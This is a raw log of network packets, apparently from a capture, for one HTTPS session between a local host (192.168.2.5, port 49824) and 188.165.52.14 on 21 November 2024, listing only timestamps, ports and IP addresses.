Nov 21, 2024 22:12:12.866875887 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.900163889 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.900213003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.900346041 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.900394917 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.900455952 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.999587059 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.999656916 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.999784946 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.999847889 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.999876022 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.999896049 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.006834984 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.006880999 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.006970882 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.006995916 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.007025957 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.007045031 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.015177011 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.015224934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.015261889 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.015271902 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.015305042 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.015333891 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.023350000 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.023394108 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.023449898 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.023478985 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.023505926 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.023519039 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.032520056 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.032581091 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.032664061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.032672882 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.032691956 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.032713890 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.040081978 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.040128946 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.040178061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.040188074 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.040215015 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.042927027 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.046552896 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.046598911 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.046636105 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.046643972 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.046674013 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.046693087 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.091330051 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.091384888 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.091487885 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.091506004 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.091552019 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.198367119 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.198390007 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.198446989 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.198460102 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.198488951 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.198506117 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.212400913 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.212418079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.212476969 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.212486982 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.212502956 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.212517023 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.213478088 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.213495970 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.213536024 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.213546038 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.213635921 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.221241951 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.221266985 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.221322060 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.221335888 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.221359015 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.221374989 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.229116917 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.229139090 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.229195118 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.229207993 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.229239941 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.235260963 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.235276937 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.235327959 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.235337019 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.235373974 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.244249105 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.244265079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.244316101 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.244324923 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.244662046 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.292226076 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.292251110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.292334080 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.292345047 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.292378902 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.389734983 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.389827967 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.389986038 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.390023947 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.390073061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.397052050 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.397100925 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.397161961 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.397170067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.397202969 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.397217035 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.404628038 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.404681921 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.404735088 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.404742956 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.404777050 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.404795885 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.412499905 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.412549019 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.412619114 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.412630081 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.412676096 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.419843912 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.419893980 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.419989109 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.420000076 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.420044899 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.426992893 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.427052021 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.427126884 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.427134991 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.427160025 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.427174091 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.434556007 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.434623003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.434709072 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.434729099 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.434767962 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.434782982 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.482743025 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.482812881 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.482920885 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.482949972 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.482979059 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.483000994 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.581723928 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.581792116 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.581892014 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.581923962 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.581943035 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.581967115 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.588773966 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.588819981 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.588879108 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.588886023 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.588920116 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.588944912 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.596395969 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.596457958 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.596482038 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.596489906 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.596532106 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.604110003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.604170084 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.604238033 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.604266882 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.604283094 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.604305983 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.610836983 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.610860109 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.610949039 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.610977888 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.611018896 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.618933916 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.618956089 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.619085073 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.619116068 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.619183064 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.625982046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.625999928 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.626092911 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.626120090 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.626169920 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.675043106 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.675122023 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.675246000 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.675246000 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.675280094 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.675333023 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.778676987 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.778698921 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.778753996 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.778776884 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.778788090 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.778837919 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.785609007 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.785629034 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.785675049 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.785686016 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.785696030 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.785722017 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.792957067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.792973995 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.793044090 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.793054104 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.793092012 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.800735950 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.800750971 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.800801992 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.800820112 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.800846100 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.800854921 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.807598114 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.807615995 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.807667017 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.807689905 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.807713032 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.807727098 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.815669060 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.815685034 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.815748930 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.815769911 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.815809011 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.822453022 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.822474003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.822520971 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.822535038 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.822561979 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.822577953 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.866885900 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.866904974 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.866949081 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.866969109 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.866981983 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.866997957 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.971879005 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.971904039 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.972012997 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.972047091 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.972085953 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.978857040 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.978873968 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.978951931 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.978961945 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.978997946 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.986249924 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.986265898 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.986339092 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.986351967 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.986388922 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.994066954 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.994086027 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.994168997 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:13.994193077 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:13.994230986 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.001425982 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.001442909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.001550913 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.001566887 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.001607895 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.008903027 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.008922100 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.009002924 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.009013891 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.009052992 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.015782118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.015805006 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.015881062 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.015892029 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.015928984 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.059247017 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.059264898 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.059340000 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.059365988 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.059406042 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.164518118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.164539099 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.164702892 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.164740086 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.164786100 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.171612978 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.171628952 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.171677113 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.171685934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.171721935 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.178359032 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.178380966 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.178437948 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.178446054 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.178495884 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.186813116 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.186836004 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.186925888 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.186942101 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.186980963 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.193826914 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.193849087 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.193922043 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.193937063 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.193974018 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.200968027 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.200992107 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.201052904 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.201067924 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.201101065 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.207889080 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.207909107 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.207992077 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.208010912 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.208045006 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.264170885 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.264198065 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.264372110 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.264403105 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.264444113 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.365422010 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.365442991 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.365581036 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.365608931 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.365653992 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.373004913 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.373024940 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.373105049 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.373121977 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.373161077 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.380729914 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.380749941 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.380824089 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.380837917 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.380872011 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.387967110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.387988091 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.388084888 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.388102055 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.388144970 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.395095110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.395116091 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.395189047 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.395204067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.395245075 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.402561903 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.402580976 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:14.402678967 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:14.402697086 CET	443	49824	188.165.52.14	192.168.2.5
